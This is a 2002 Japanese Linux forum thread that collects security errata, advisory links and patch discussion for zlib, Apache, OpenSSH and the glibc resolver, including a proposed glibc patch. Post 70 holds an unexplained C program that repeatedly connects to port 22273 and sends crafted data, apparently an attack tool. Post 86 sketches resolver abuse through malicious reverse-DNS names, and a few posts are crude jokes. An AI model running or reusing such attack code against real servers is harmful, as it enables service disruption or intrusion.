1 名前:login:Penguin [02/02/02 13:55 ID:TzxKF1DS.net] 日々発見されるセキュリティホール。 その情報を一人であつめるのは大変です。情報の共有をしましょう。 先人達が埋めてくれた穴は、ありがたく反映させていただきましょう。 www.redhat.co.jp/support/errata/rh72-errata-security.html www.turbolinux.co.jp/security/ www.vinelinux.org/errata/2x/i386.html www.debian.org/security/ ML等からの情報もよろしく
2 名前:login:Penguin mailto:sage [02/02/02 14:23 ID:vcmtljfb.net] 2ゲトー(・∀・)
3 名前:login:Penguin mailto:sage [02/02/02 15:35 ID:WnmUFKAf.net] こうやって並べてみると、Debianが一番対応早いな。 2,3日遅れでRedHat、ついでTurboか。 Vineのatとrsyncの対応はどうなってるんだ?
4 名前:login:Penguin mailto:sage [02/02/02 16:45 ID:ZpBt8Xu4.net] >>3 うち、Debianじゃないんだけど apt-get upgrade をcronさせとけば勝手に埋まりそうで良いなぁ〜 でも、これって「隣の花は赤い」みたいなものかなぁ・・・
5 名前:login:Penguin [02/02/02 16:51 ID:pTTak0WL.net] 自動実行すると、設定ファイルがデフォルトに戻ってしまってそれがかえって 穴になってしまうってことは無いのかな?
6 名前:login:Penguin mailto:sage [02/02/02 17:24 ID:iy9HS+C9.net] >>5 DebianだとConffileはどうするか決められるでしょ
7 名前:login:Penguin mailto:sage [02/02/03 00:45 ID:kKB0w3Ro.net] >>6 やはり Debian 強いね。 そういうおれは、手動アップの 厨房な夜
8 名前:login:Penguin mailto:sage [02/02/04 17:21 ID:wJQG6Z6M.net] cron で upgrade すると対話的な質問のところで止まるという罠。
9 名前:login:Penguin [02/02/06 09:06 ID:wzRHhwGZ.net] 2/5 Vine-errata version-up at-3.1.8-23vl0.1.i386.rpm security-hole uucp-1.06.1-31vl0.i386.rpm rsync-2.4.1-2vl1.i386.rpm
10 名前:login:Penguin [02/02/06 09:37 ID:z1OnXuT2.net] Turbolinux 2002-02-01 mozilla 任意のホストのクッキーが不正に取得されてしまう
11 名前:login:Penguin mailto:sage [02/02/06 13:22 ID:aFEtGAeu.net] 関連スレッド pc.2ch.net/test/read.cgi/unix/995966668/
12 名前:login:Penguin [02/02/06 16:18 ID:CGfU8woV.net] 彼女のセキュリティーホールを守るにはどうしたらいいですか?
13 名前:login:Penguin mailto:sage [02/02/06 16:35 ID:WFWamG0l.net] >>12 貞操帯
14 名前:login:Penguin mailto:sage [02/02/06 16:56 ID:IgP4o0CH.net] >>13 予防的手段だけに頼ってはいけない。 インテグリティーチェックと定期的なログ監査。事後対策も忘れずに!
15 名前:login:Penguin mailto:sage [02/02/06 17:36 ID:suxHB5vN.net] >>12 常時自分がログインしておくというのは?
16 名前:login:Penguin mailto:sage [02/02/06 17:50 ID:YEmPbmK+.net] >>12 電源切っとけ。
17 名前:login:Penguin mailto:sage [02/02/06 19:28 ID:25EU2pWE.net] パッチうぉ あてよう
18 名前:login:Penguin [02/02/18 21:43 ID:7km2bSU3.net] SNMPセキュリティーホールage。 つーか、使ってる人いるのか? 使わんのだったら、パケジ消しとけ。 www.debian.org/ www.turbolinux.co.jp/security/
19 名前:login:Penguin mailto:sage [02/02/18 22:09 ID:Y/OOH446.net] at, uucp, ucd-sntpなんて個人でLinuxやってる場合は要らんとおもう
20 名前:rrdtool [02/02/18 22:38 ID:e0R/XIhl.net] net-snmp 4.2.3をtar玉から入れてる人は snmpnetstatのfixパッチも当てたほうがエエぞ fixパッチはredhatのSRPMから頂くとよろし
21 名前:login:Penguin [02/02/18 23:03 ID:xV7FaOh2.net] uucp、ucd-snmpはともかく、atは...まぁ、無くてもこまらんか。 ともかく、RPM系のディストリビューションで、「全部」とかで インストールしてると、入ってる可能性大だから、用チェック かとおもうですはい。
22 名前:login:Penguin mailto:age [02/03/03 03:46 ID:631jyWWL.net] ipchainsの設定をしてみました。この設定はどうでしょうか? # ipchains -nL Chain input (policy ACCEPT): target prot opt source destination ports fw all ------ 0.0.0.0/0 0.0.0.0/0 n/a Chain forward (policy DENY): target prot opt source destination ports MASQ all ------ 192.168.1.0/24 0.0.0.0/0 n/a Chain output (policy ACCEPT): Chain fw (1 references): target prot opt source destination ports ACCEPT tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 25 ACCEPT tcp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023 ACCEPT udp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023 DENY tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023 DENY udp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023
23 名前:login:Penguin mailto:sage [02/03/03 12:16 ID:SZmEd9Su.net] >>22 スレ違い。質問スレでやっとけ。
24 名前:login:Penguin [02/03/03 12:18 ID:SZmEd9Su.net] www.turbolinux.co.jp/security/php-4.1.2-1.html PHPボロボロだな
25 名前:login:Penguin [02/03/07 15:55 ID:cquF55ex.net] 3/6 Vine-errata security hole squid-2.3.STABLE5-0vl2.i386.rpm
26 名前:zlib! mailto:age [02/03/12 16:41 ID:UaXqoxZ1.net] zlib祭りだYO! www.linuxsecurity.com/articles/security_sources_article-4582.html www.kb.cert.org/vuls/id/368819
27 名前:login:Penguin [02/03/12 21:43 ID:lpFBAfJZ.net] www.zdnet.co.jp/news/0203/12/e_linux.html
28 名前:login:Penguin mailto:sage [02/03/12 21:57 ID:e6hdJtN/.net] zlib祭り会場はどこですか?
29 名前:login:Penguin [02/03/12 23:21 ID:11TI6bf4.net] >>28 あなたのおうちの犬箱です
30 名前:login:Penguin mailto:sage [02/03/12 23:25 ID:tWqbf2NQ.net] ftp.mozilla.orgが繋がらないのはzlib祭りのお陰ですか?
31 名前:sage mailto:sage [02/03/13 00:41 ID:mlfLGoSb.net] www.kb.cert.org/vuls/id/368819 cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0059 www.gzip.org/zlib/advisory-2002-03-11.txt slashdot.jp/article.pl?sid=02/03/12/1325239&mode=nested www.ipa.go.jp/security/news/news.html www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020312_zlib
32 名前:login:Penguin [02/03/13 02:02 ID:Rw4EvJaU.net] 3/12 Vine-errata security hole openssh-2.9.9p2-0vl0.3.i386.rpm openssh-clients-2.9.9p2-0vl0.3.i386.rpm openssh-server-2.9.9p2-0vl0.3.i386.rpm openssh-askpass-2.9.9p2-0vl0.3.i386.rpm
33 名前:login:Penguin [02/03/13 08:10 ID:P2nMMkSR.net] げー、zlibやばいなぁ。ローカルからの攻撃には無力っぽいね。 ブラウザ経由の攻撃もできるのかなぁ... (不正なPNG送るとかで)
34 名前:名無しさん@お腹いっぱい。 mailto:sage [02/03/13 09:00 ID:X9FAJrTn.net] mod_gzipとかやばそうだね
35 名前:名無しさん@Emacs [02/03/13 10:03 ID:uVnzr98W.net] >>33 まぁ何はなくともさっさとzlibを更新(-> 1.1.4)することだね。 pngやgzipを直接解釈するようなサーバでもない限り外部からの攻撃は受けない だろうし、apacheをrootで動かしてるような豪快な奴も居ない(と信じたい) だろうから、あまり大きな問題にはならないだろうけど。
36 名前:zlib! mailto:age [02/03/13 11:47 ID:zAIB51rk.net] bugtraqに出てたH D Moore氏のpngの画像を XEmacsでプレビューしたらXEmacsが落ちたYO!
37 名前:zlib! mailto:age [02/03/13 11:54 ID:zAIB51rk.net] >>36 サンプル画像はここにもあるYO! www.digitaloffense.net/openssh_zlib/
38 名前:login:Penguin mailto:sage [02/03/13 19:47 ID:dfFI4Er/.net] >>36 他力本願で申し訳ないが、coreとか調べてみました? 結局どーなってどーなっちゃうのかよくわからんもので・・・。 stackoverflowと同様だと思ってればいいのかな〜
39 名前:login:Penguin mailto:sage [02/03/13 23:37 ID:7LNGAJrc.net] apache って root で動かすとやばいの?
40 名前:login:Penguin mailto:sage [02/03/14 00:38 ID:6jzSzsuH.net] >>39 そりゃやばいだろ (;´Д`)
41 名前:zlib! mailto:sage [02/03/14 11:03 ID:Ok5u5E1d.net] >>38 XEmacs(bamboo)はsignal 11で落ちたみたい coreはあるけどgdb扱える能力無いのよ。すまん で、zlib最新にしてlibpngリコンパイルしたら落ちなくなったYO!
42 名前:login:Penguin mailto:sage [02/03/16 19:05 ID:49Bp+Ljr.net] Debian セキュリティ HOWTO www.jp.debian.org/doc/manuals/securing-debian-howto/
43 名前:login:Penguin [02/03/21 09:18 ID:l6UXxXqO.net] 3/21 Vine-errata security hole zlib-1.1.3-25vl0.i386.rpm zlib-devel-1.1.3-25vl0.i386.rpm cvs-1.11.1p1-7vl0.i386.rpm dump-0.4b19-5.6x.1.i386.rpm dump-static-0.4b19-5.6x.1.i386.rpm kernel-2.2.19-0vl0.24.i386.rpm kernel-2.2.19-0vl0.24.i586.rpm kernel-2.2.19-0vl0.24.i686.rpm kernel-BOOT-2.2.19-0vl0.24.i386.rpm kernel-doc-2.2.19-0vl0.24.i386.rpm kernel-headers-2.2.19-0vl0.24.i386.rpm kernel-ibcs-2.2.19-0vl0.24.i386.rpm kernel-pcmcia-cs-2.2.19-0vl0.24.i386.rpm kernel-smp-2.2.19-0vl0.24.i386.rpm kernel-smp-2.2.19-0vl0.24.i586.rpm kernel-smp-2.2.19-0vl0.24.i686.rpm kernel-source-2.2.19-0vl0.24.i386.rpm kernel-utils-2.2.19-0vl0.24.i386.rpm rmt-0.4b19-5.6x.1.i386.rpm rpm-3.0.6-0vl2.1.i386.rpm rpm-build-3.0.6-0vl2.1.i386.rpm rpm-devel-3.0.6-0vl2.1.i386.rpm rpm-python-3.0.6-0vl2.1.i386.rpm popt-1.5.1-0vl2.1.i386.rpm rsync-2.4.1-2vl2.i386.rpm sash-3.4-2vl0.i386.rpm info-4.0-5vl0.i386.rpm texinfo-4.0-5vl0.i386.rpm
44 名前:login:Penguin [02/03/21 09:18 ID:l6UXxXqO.net] 3/21 Vine-errata security hole apache-1.3.23-0vl0.1.i386.rpm apache-devel-1.3.23-0vl0.1.i386.rpm apache-manual-1.3.23-0vl0.1.i386.rpm mod_ssl-2.8.7-0vl0.1.i386.rpm fileutils-4.0x-1vl4.i386.rpm
45 名前:login:Penguin [02/04/05 12:26 ID:ikMkS74J.net] 04/04 Vine-errata security hole XFree86-3.3.6-13vl28.1.i386.rpm XFree86-100dpi-fonts-3.3.6-13vl28.1.i386.rpm XFree86-75dpi-fonts-3.3.6-13vl28.1.i386.rpm XFree86-3DLabs-3.3.6-13vl28.1.i386.rpm XFree86-8514-3.3.6-13vl28.1.i386.rpm XFree86-AGX-3.3.6-13vl28.1.i386.rpm XFree86-FBDev-3.3.6-13vl28.1.i386.rpm XFree86-I128-3.3.6-13vl28.1.i386.rpm XFree86-Mach32-3.3.6-13vl28.1.i386.rpm XFree86-Mach64-3.3.6-13vl28.1.i386.rpm XFree86-Mach8-3.3.6-13vl28.1.i386.rpm XFree86-Mono-3.3.6-13vl28.1.i386.rpm XFree86-P9000-3.3.6-13vl28.1.i386.rpm XFree86-S3-3.3.6-13vl28.1.i386.rpm XFree86-S3V-3.3.6-13vl28.1.i386.rpm XFree86-SVGA-3.3.6-13vl28.1.i386.rpm XFree86-VGA16-3.3.6-13vl28.1.i386.rpm XFree86-W32-3.3.6-13vl28.1.i386.rpm XFree86-XF86Setup-3.3.6-13vl28.1.i386.rpm XFree86-Xnest-3.3.6-13vl28.1.i386.rpm XFree86-Xvfb-3.3.6-13vl28.1.i386.rpm XFree86-cyrillic-fonts-3.3.6-13vl28.1.i386.rpm XFree86-devel-3.3.6-13vl28.1.i386.rpm XFree86-doc-3.3.6-13vl28.1.i386.rpm XFree86-libs-3.3.6-13vl28.1.i386.rpm XFree86-xfs-3.3.6-13vl28.1.i386.rpm
46 名前:login:Penguin [02/04/11 21:08 ID:n5epu8MN.net] 04/11 Vine-errata security hole squid-2.3.STABLE5-0vl4.i386.rpm
47 名前:名無しさん [02/04/12 15:15 ID:357cbhyA.net] ぼくの肛門も埋めてください
48 名前:login:Penguin [02/05/14 10:29 ID:nCRPXE+h.net] 05/14 Vine-errata security hole sudo-1.6.3p6-0.6vl3.i386.rpm
49 名前:login:Penguin mailto:sage [02/05/28 18:43 ID:nc9YjYw6.net] apt-get update apt-get upgrade だけでは不十分ですか?
50 名前:login:Penguin mailto:age [02/05/28 18:43 ID:nc9YjYw6.net] age忘れ。
51 名前:login:Penguin [02/06/03 00:38 ID:ecxsuEIo.net] 僕のチンポの先も埋めてください
52 名前:login:Penguin [02/06/03 00:54 ID:Yo9snOlP.net] >apt-get update >apt-get upgrade > >だけでは不十分ですか? ヴァカじゃん。そういう姿勢がそもそもsecurity hole
53 名前:login:Penguin [02/06/06 13:09 ID:H4e/6DmJ.net] 06/06 Vine-errata security hole fetchmail-5.9.11-0vl1.i386.rpm imap-2001a-10vl1.i386.rpm imap-devel-2001a-10vl1.i386.rpm bzip2-1.0.1-3vl3.i386.rpm bzip2-devel-1.0.1-3vl3.i386.rpm
54 名前:login:Penguin [02/06/13 09:25 ID:+8hN98ol.net] 06/13 Vine-errata security hole tcpdump-3.6.2-13vl1.i386.rpm libpcap-0.6.2-13vl1.i386.rpm arpwatch-2.1a11-13vl1.i386.rpm
55 名前:login:Penguin [02/06/18 15:41 ID:Y4ljwPvb.net] Apacheにセキュリティホール slashdot.jp/article.pl?sid=02/06/18/0434227 UNIX板 Apache関連 Part2 pc.2ch.net/test/read.cgi/unix/1017812420/466n-
56 名前:login:Penguin mailto:sage [02/06/19 08:45 ID:HipJ6wEK.net] バグフィクスされたapacheがリリースされたそうです。 www.apache.org/dist/httpd/Announcement.html httpd.apache.org/info/security_bulletin_20020617.txt
57 名前:login:Penguin [02/06/19 23:43 ID:APWNucgQ.net] 06/19 Vine-errata security hole apache-1.3.26-0vl1.i386.rpm apache-devel-1.3.26-0vl1.i386.rpm apache-manual-1.3.26-0vl1.i386.rpm mod_ssl-2.8.9-0vl1.i386.rpm
58 名前:login:Penguin [02/06/20 10:16 ID:01vvi0s8.net] >>55 Red Hat rhn.redhat.com/errata/RHSA-2002-103.html
59 名前:login:Penguin [02/06/20 10:44 ID:gutuxgNU.net] Debian (potato) DSA-131-1 apache -- remote DoS / exploit www.debian.org/security/2002/dsa-131 DSA-132-1 apache-ssl -- remote DoS / exploit www.debian.org/security/2002/dsa-132
60 名前:login:Penguin [02/06/20 13:37 ID:RkoCmceO.net] Apache のそれは 32bit Linux でもヤバそう。 某MLにexploitが流れてた。
61 名前:login:Penguin [02/06/20 13:56 ID:gutuxgNU.net] Apache Web サーバプログラムの脆弱性に関する注意喚起 www.jpcert.or.jp/at/2002/at020003.txt
62 名前:login:Penguin [02/06/20 14:06 ID:RkoCmceO.net] 情報スカスカのJPCERT勧告なんぞ読んでも仕方無いぞ。ほい日本語版。 www.lac.co.jp/security/intelligence/CERT/CA-2002_17.html
63 名前:login:Penguin mailto:sage [02/06/20 14:24 ID:01vvi0s8.net] こっちはそれなりに有用。 www.ipa.go.jp/security/ciadr/20020619apache.html
64 名前:名無しさん mailto:sage [02/06/22 23:55 ID:STj3pUTJ.net] 「くだ質」とどちらに投げようか迷った挙げ句、こちらに 投げることにしました。 以下のような自分の使用状況がセキュリティの面で安全か どうか伺いたく存じます。 自宅でLinuxを使っています。Flets ADSLを契約しており、 常時接続ではなく、時々インターネットに接続して電子 メールを読み書きしたり、WWWで情報を得たりしています。 ルータ等は使っていません。他のホストにwwwやftpで クライエントとして接続することはあっても、自ホストを サーバにする必要は殆どないと考えています。ただ例外で、 smtpサーバとしてnullmailerを使っています。 Debian GNU/Linux sidを使っており、電源を入れる度に apt-getでパッケージを更新しています。 ftpd、rsh-server、ssh、apache等は削除しています。 kernelは2.4.18です。 /etc/hosts.allowは何も記述せず、 /etc/hosts.denyはALL: ALLにしてます。 # netstat --tcp --all は、 Proto 受信-Q 送信-Q 内部アドレス 外部アドレス 状態 tcp 0 0 *:time *:* LISTEN tcp 0 0 *:32927 *:* LISTEN tcp 0 0 xxx.yyy.zzz.uuu:33011 aaa.bbb.ccc.ddd:smtp TIME_WAIT となります(xxx.yyy.zzz.uuuは割り当てられたIPアドレス、 aaa.bbb.ccc.dddはプロバイダのメールサーバのIPアドレス)。
65 名前:login:Penguin mailto:sage [02/06/23 00:03 ID:bXEc0h6E.net] >>64 > 以下のような自分の使用状況がセキュリティの面で安全か > どうか伺いたく存じます。 「安全」と「安全でない」の2つしか状態がないと思ってる?
66 名前:login:Penguin [02/06/23 00:47 ID:knGXFfYf.net] Apache の脆弱性を攻撃するツールが登場 slashdot.jp/article.pl?sid=02/06/22/1240249&mode=thread
67 名前:login:Penguin [02/06/23 01:02 ID:kepzSriJ.net] >>66 充分に気をつけているほうだと思うよ。 でもセキュリティにこれで完璧ってのは無いんだよ。 あくまでコストとリスクとの綱引きでしかない。 しかしそれで侵入されたからって君を責める人はあまりいないだろう。
68 名前:login:Penguin mailto:sage [02/06/23 01:25 ID:xLORxFdI.net] >>66 inetdも止めてしまおう。
69 名前:login:Penguin [02/06/25 15:34 ID:drybiZ1b.net] OpenSSH に新たな弱点発見。詳細は来週まで秘密。 リモートから悪用可能らしい。 3.3 にも同じ弱点があるが、侵入は防げるそうだ。
70 名前:login:Penguin mailto:sage [02/06/25 22:33 ID:yPSMZ+Jm.net] void writei(int fd,int num){num = htonl(num);write(fd,&num,4);} void writes(int fd,char *s){write(fd,s,strlen(s)+1);} void main(int argc,char **argv){struct hostent *he;struct sockaddr_in si;int fd; char a[10];he = gethostbyname(argv[1]);while(1){fd = socket(PF_INET,SOCK_STREAM,0);si.sin_family = AF_INET;memcpy(&si.sin_addr,he->h_addr_list[0],sizeof(si.sin_addr)); si.sin_port = htons(22273);connect(fd,(struct sockaddr *)&si,sizeof(si));sprintf(a,"%d",rand());writei(fd,0x66);writei(fd,0); writes(fd,a);writei(fd,0);writei(fd,3);close(fd);}}
71 名前:login:Penguin [02/06/25 22:46 ID:LJSlbrtr.net] >>69 これだね。 Debian 以外のパッケージはいつころ出るんだろ。 www.koka-in.org/~haruyama/ssh_koka-in_org/0/4.html
72 名前:login:Penguin mailto:sage [02/06/26 09:06 ID:yIavaL89.net] >70 Wnnか?何の穴よ? まさかwww.freewnn.orgにある大昔の穴じゃないだろうな。
73 名前:login:Penguin mailto:sage [02/06/26 20:58 ID:0uLnP27B.net] >>72 違うっぽい。
74 名前:login:Penguin [02/06/26 22:51 ID:knPs+H7Y.net] *BSD の libc の resolver に穴が見つかったようだけど、glibc は どうなんだろう www.pine.nl/advisories/pine-cert-20020601.html
75 名前:login:Penguin [02/06/27 00:16 ID:UFWmO8g6.net] ISS から OpenSSH のアドバイザリが出た。 Challenge and Response 認証にバグ。remote root exploit。 sshd_config に ChallengeResponseAuthentication no で回避可能。3.4 で修正されている。 これがもし Theo の言ってた穴と同じものなら、 OpenSSH 3.0 以降にのみ存在する穴じゃん。 いちはやくアップデート出した Debian potato は踊らされただけか。
76 名前:login:Penguin [02/06/27 00:18 ID:UFWmO8g6.net] OpenSSH Advisory www.openssh.com/txt/preauth.adv
77 名前:login:Penguin [02/06/27 00:19 ID:UFWmO8g6.net] さみだれ式でごめん。ISS Advisory www.openssh.com/txt/iss.adv
78 名前:login:Penguin [02/06/27 00:31 ID:UFWmO8g6.net] >>75 訂正。3.0 以降じゃなくて 2.9.9 以降に弱点がある模様。 Debian 2.2 (potato) は安全な 1.2 系からわざわざ弱点のある 3.3 に入れ換えさせられた恰好だよ。Theo のアホーーーーー。 フルディスクロージャってやっぱり大事なんだな。
79 名前:login:Penguin [02/06/27 01:53 ID:b3kvzA+X.net] 06/27 Vine-errata security hole openssh-3.3p1-0vl10.i386.rpm openssh-server-3.3p1-0vl0.i386.rpm openssh-clients-3.3p1-0vl0.i386.rpm openssh-askpass-3.3p1-0vl0.i386.rpm openssh-askpass-gnome-3.3p1-0vl0.i386.rpm
80 名前:login:Penguin mailto:sage [02/06/27 01:59 ID:b3kvzA+X.net] >>79 は 06/26 発行でした。スマソ
81 名前:login:Penguin [02/06/27 11:42 ID:/viQ/aAY.net] openssh 3.4p1出てるよage
82 名前:login:Penguin mailto:sage [02/06/27 11:52 ID:EftB/YmL.net] syslogdが大きい。
83 名前:login:Penguin [02/06/27 16:56 ID:QDJgHCs7.net] resolver のバグは対岸の火事ではない模様。
84 名前:login:Penguin mailto:sage [02/06/27 17:20 ID:/viQ/aAY.net] 2ch鯖のApacheも入れ替えが始まってるね。 遅いぐらいだ。昨日の件もこれが絡んでたのだろうか。 しかし入れ替えたはいいがlinuxのlibcにも。。。。 なんてことになったら大火事だな。
85 名前:login:Penguin mailto:sage [02/06/27 18:16 ID:d3NH2M4p.net] >>84 まさに大火事のようで(藁 まあ、リモートからいじれる穴ではないだろうけど
86 名前:login:Penguin [02/06/27 18:57 ID:QDJgHCs7.net] >>85 resolver のバグはリモートからいじれる。 攻撃者は自由に設定出来るネームサーバを持っていればいい。 ある IP アドレスの逆引きホストネームに攻撃用コードを仕込む。 そしてその IP アドレスから攻撃対象のサーバに接続する。 攻撃対象のサーバが逆引きを行い、 返って来た巧妙に細工されたホスト名を正引きしたら、あぼーん。
87 名前:login:Penguin mailto:sage [02/06/27 20:05 ID:4+mBkHBL.net] glibcには*BSDよりも1箇所余計にチェックが入っているが、 これでは防げないのか?
88 名前:login:Penguin mailto:sage [02/06/27 20:31 ID:GRjz2eTH.net] OpenSSHを3.1→3.4にアップグレードしたら、sshdの起動時に This platform does not support both privilege separation and
89 名前:compression Compression disabled こんなメッセージを吐くんだけど・・・何だろ?syslogには上がらないみたいだけど気になるかな。 ちなみにRedHat6.2(kerner2.2.19/glibc2.1.3-23/OpenSSL0.9.6d) [] [ここ壊れてます]
90 名前: mailto:sage [02/06/27 20:37 ID:oX2io58x.net] >>88 Compressionは切ろう。
91 名前:login:Penguin [02/06/27 20:41 ID:QDJgHCs7.net] >>87 実際テストしてみたが落せない。 俺がヘボなだけかもしれないから識者の意見を待とう。
92 名前:88 mailto:sage [02/06/27 20:42 ID:GRjz2eTH.net] >>89 sshd_configのCompressをnoに指定したら出なくなったよ。 感謝。
93 名前:login:Penguin mailto:sage [02/06/27 21:00 ID:4+mBkHBL.net] >>90 FreeBSDをパッチを見るに、gethnamaddr.cはずでにFreeBSDの パッチと同じ処理が入っている。getnetnamadr.cにはない。
94 名前:login:Penguin [02/06/27 21:00 ID:QDJgHCs7.net] >>90 識者の意見が間違ってた Aapche の時のような事もあるから itojun 氏のパッチあててもいいかもしれない。 でも勇み足で必要でないアップデートを出して、わざわざ穴を 開けてしまったDebian potato の例もあるし、悩ましいところだな。
95 名前:login:Penguin [02/06/27 21:13 ID:QDJgHCs7.net] 識者登場age。
96 名前:login:Penguin mailto:sage [02/06/27 21:32 ID:4+mBkHBL.net] 直すべきは nss_dns/dns-network.c か。 古いの見てた。すまそ。
97 名前:login:Penguin [02/06/28 11:19 ID:CALm/HoI.net] 新しいBINDが出た
98 名前:login:Penguin mailto:sage [02/06/28 13:40 ID:PahA8xFy.net] >>93 itojunさんのパッチってどこでgetできます? glibcに当たるのかいな?
99 名前:login:Penguin [02/06/28 16:13 ID:DZqksx+C.net] >>97 FreeBSD や NetBSD の Advisory 嫁。 そのままでは当たらないだろうから手作業で当てれ。 ま、俺はめんどいから様子見。
100 名前:login:Penguin mailto:sage [02/06/28 20:57 ID:Yj/G45g0.net] つーか、おまえら誰もglibcのコード読んでないんとちゃうか?
101 名前:login:Penguin mailto:sage [02/06/28 21:47 ID:Yj/G45g0.net] --- glibc-2.2.5/resolv/nss_dns/dns-network.c.org 2001-07-06 13:55:39.000000000 +0900 +++ glibc-2.2.5/resolv/nss_dns/dns-network.c 2002-06-28 21:42:26.000000000 +0900 @@ -328,7 +328,9 @@ } cp += n; *alias_pointer++ = bp; - bp += strlen (bp) + 1; + n = strlen(bp) + 1; + bp += n; + linebuflen -= n; result->n_addrtype = class == C_IN ? AF_INET : AF_UNSPEC; ++have_answer; } こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の 処理がすでに入っている。
102 名前:名無しさん@XEmacs mailto:sage [02/06/29 01:29 ID:cleVXGS3.net] >>100 > こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の > 処理がすでに入っている。 name6.c のチャンクは? と思ったけど,'99 に直ってるすね. ttp://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/resolv/nss_dns/dns-host.c.diff?r1=1.15&r2=1.16&cvsroot=glibc&f=h
103 名前:login:Penguin [02/06/29 04:06 ID:uLF75Z2Y.net] >>79 Vine-errata security hole openssh-3.4p1-0vl2.i386.rpm openssh-server-3.4p1-0vl2.i386.rpm openssh-clients-3.4p1-0vl2.i386.rpm openssh-askpass-3.4p1-0vl2.i386.rpm openssh-askpass-gnome-3.4p1-0vl2.i386.rpm
104 名前:login:Penguin mailto:sage [02/07/02 09:30 ID:QAyrQPMn.net] >>100-101 通報しますた。
105 名前:login:Penguin mailto:sage [02/07/02 11:35 ID:qVWzSPns.net] www.sendmail.org/8.12.5.html > 8.12.5/8.12.52002/06/25 > SECURITY: The DNS map can cause a buffer overflow if the user > specifies a dns map using TXT records in the configuration > file and a rogue DNS server is queried. None of the > sendmail supplied configuration files use this option hence > they are not vulnerable. Problem noted independently by > Joost Pol of PINE Internet and Anton Rang of Sun Microsystems. 普通の設定では影響なし、なのかな?
106 名前:login:Penguin mailto:sage [02/07/02 11:44 ID:qVWzSPns.net] resolver 問題、CERT/CC によると glibc はこれで fix されてるらしい。 www.kb.cert.org/vuls/id/AAMN-5BMSW2 しかし、こういうのって他のプロジェクトに還元されないもんなんだろうか。
107 名前:login:Penguin mailto:age [02/07/02 12:47 ID:KLRYFYVU.net] 上のパッチ、だれかUlrich Drepperに投げた?
108 名前:地獄狂 YahooBB219017000159.bbtec.net ◆7WP8X9hw [02/07/02 13:39 ID:hdi7nBII.net] よくわかんないんだけど、glibcのバグはどのバージョンにあるの?
109 名前:login:Penguin mailto:sage [02/07/04 02:52 ID:qk/rUU9i.net] >>57 07/02 Vine-errata security hole apache-1.3.26-0vl2.i386.rpm apache-devel-1.3.26-0vl2.i386.rpm apache-manual-1.3.26-0vl2.i386.rpm mod_ssl-2.8.9-0vl2.i386.rpm
110 名前:login:Penguin mailto:sage [02/07/04 13:55 ID:50T+DZdt.net] dammit.lt/apache-worm/ このApacheワームのソースってどこから出たものなのかな。 ワーム自体は蜜壷で捕まえたみたいだけど。
111 名前:login:Penguin [02/07/04 14:07 ID:nB1GJwB4.net] Squid Proxy Cache Security Update Advisory SQUID-2002:3 - Security advisory several issues in Squid-2.4.STABLE6 and earlier. Squid-2.4.STABLE7 released to address these issues. www.squid-cache.org/Advisories/SQUID-2002_3.txt
112 名前:login:Penguin mailto:sage [02/07/04 14:13 ID:WhJXedKe.net] >>109 投稿した人は「僕の inbox に入ってた」って言ってた。
113 名前:login:Penguin [02/07/07 01:03 ID:BITbiOEM.net] snortのalert(警告)をメールで携帯に送りたいんですが、 どのようにすれば良いのでしょうか。 confファイルにはそれらしき箇所が見つかりませんでした。
114 名前:login:Penguin [02/07/07 01:06 ID:puqWG/eL.net] >>112 snort 単体ではできない。 syslog と swatch 等を使うか、snort 用のツールを使う。
115 名前:112 mailto:sage [02/07/07 02:22 ID:BITbiOEM.net] >>113 さんくすこ
116 名前:login:Penguin [02/07/08 00:56 ID:/S0ObH45.net] NetSNMPとMRTGでサーバを監視しようと思ってるんですが、 MRTGに関してはローカルホスト(NetSNMPが入ってるマシン)を対象に 監視を行っても良いのでしょうか。 なんか説明ページだと、ルータが監視の対象となってるみたいなんですが。 (ルータがSNMPに対応していないので…)
117 名前:login:Penguin mailto:sage [02/07/08 12:47 ID:X0vw/Q8k.net] >>115 問題なし
118 名前:login:Penguin [02/07/08 21:11 ID:u3KFO/Rs.net] 07/08 Vine-errata security hole squid-2.4.STABLE7-0vl1.i386.rpm
119 名前:login:Penguin mailto:age [02/07/11 10:09 ID:5UzWVYho.net] ttp://lwn.net/Articles/4545/ This bug has been fixed for the gethostbyXXX class of functions in GNU libc in 1999. Unfortunately, there is similar code in the getnetbyXXX functions in recent glibc implementations, and the code is enabled by default. However, these functions are used by very few applications only, such as ifconfig and ifuser, which makes exploits less likely. やはり....
120 名前:login:Penguin mailto:sage [02/07/11 13:11 ID:yBUV78yy.net] www.kb.cert.org/vuls/id/AAMN-5BMSW2 更新されてる
121 名前:login:Penguin mailto:sage [02/07/17 15:50 ID:c18o8yEa.net] 最近新しい穴が見つからないねぇ。 いいことなんだが、何かつまらんw
122 名前:login:Penguin [02/07/22 23:24 ID:/iXwHkpN.net] キタ━━━━━━(゚∀゚)━━━━━━ !!! PHP 4.2.0/4.2.1 に任意コード実行可能なセキュリティホール。 また IA32 じゃ任意コード実行は出来ないなんて言ってるよ。 ホントカナー???
123 名前:login:Penguin [02/07/26 10:13 ID:GbcCcnsG.net] Updated glibc packages fix vulnerabilities in resolver rhn.redhat.com/errata/RHSA-2002-139.html > A buffer overflow vulnerability has been found in the way the glibc > resolver handles the resolution of network names and addresses via DNS (as > per Internet RFC 1011). Version 2.2.5 of glibc and earlier versions are > affected. A system would be vulnerable to this issue if the > "networks" database in /etc/nsswitch.conf includes the "dns" entry. By > default, Red Hat Linux ships with "networks" set to "files" and > is therefore not vulnerable to this issue. (CAN-2002-0684) > > A second, related, issue is a bug in the glibc-compat packages, which > provide compatibility for applications compiled against glibc version > 2.0.x. Applications compiled against this version (such as those > distributed with early Red Hat Linux releases 5.0, 5.1, and 5.2) could also > be vulnerable to this issue. (CAN-2002-0651) > > These errata packages for Red Hat Linux 7.1 and 7.2 on the Itanium > architecture also include a fix for the strncpy implementation in some > boundary cases.
124 名前:名無しさん@Emacs [02/07/26 12:55 ID:WWUr2yVC.net] >>120 良いことではないか。ないにこしたことはない。
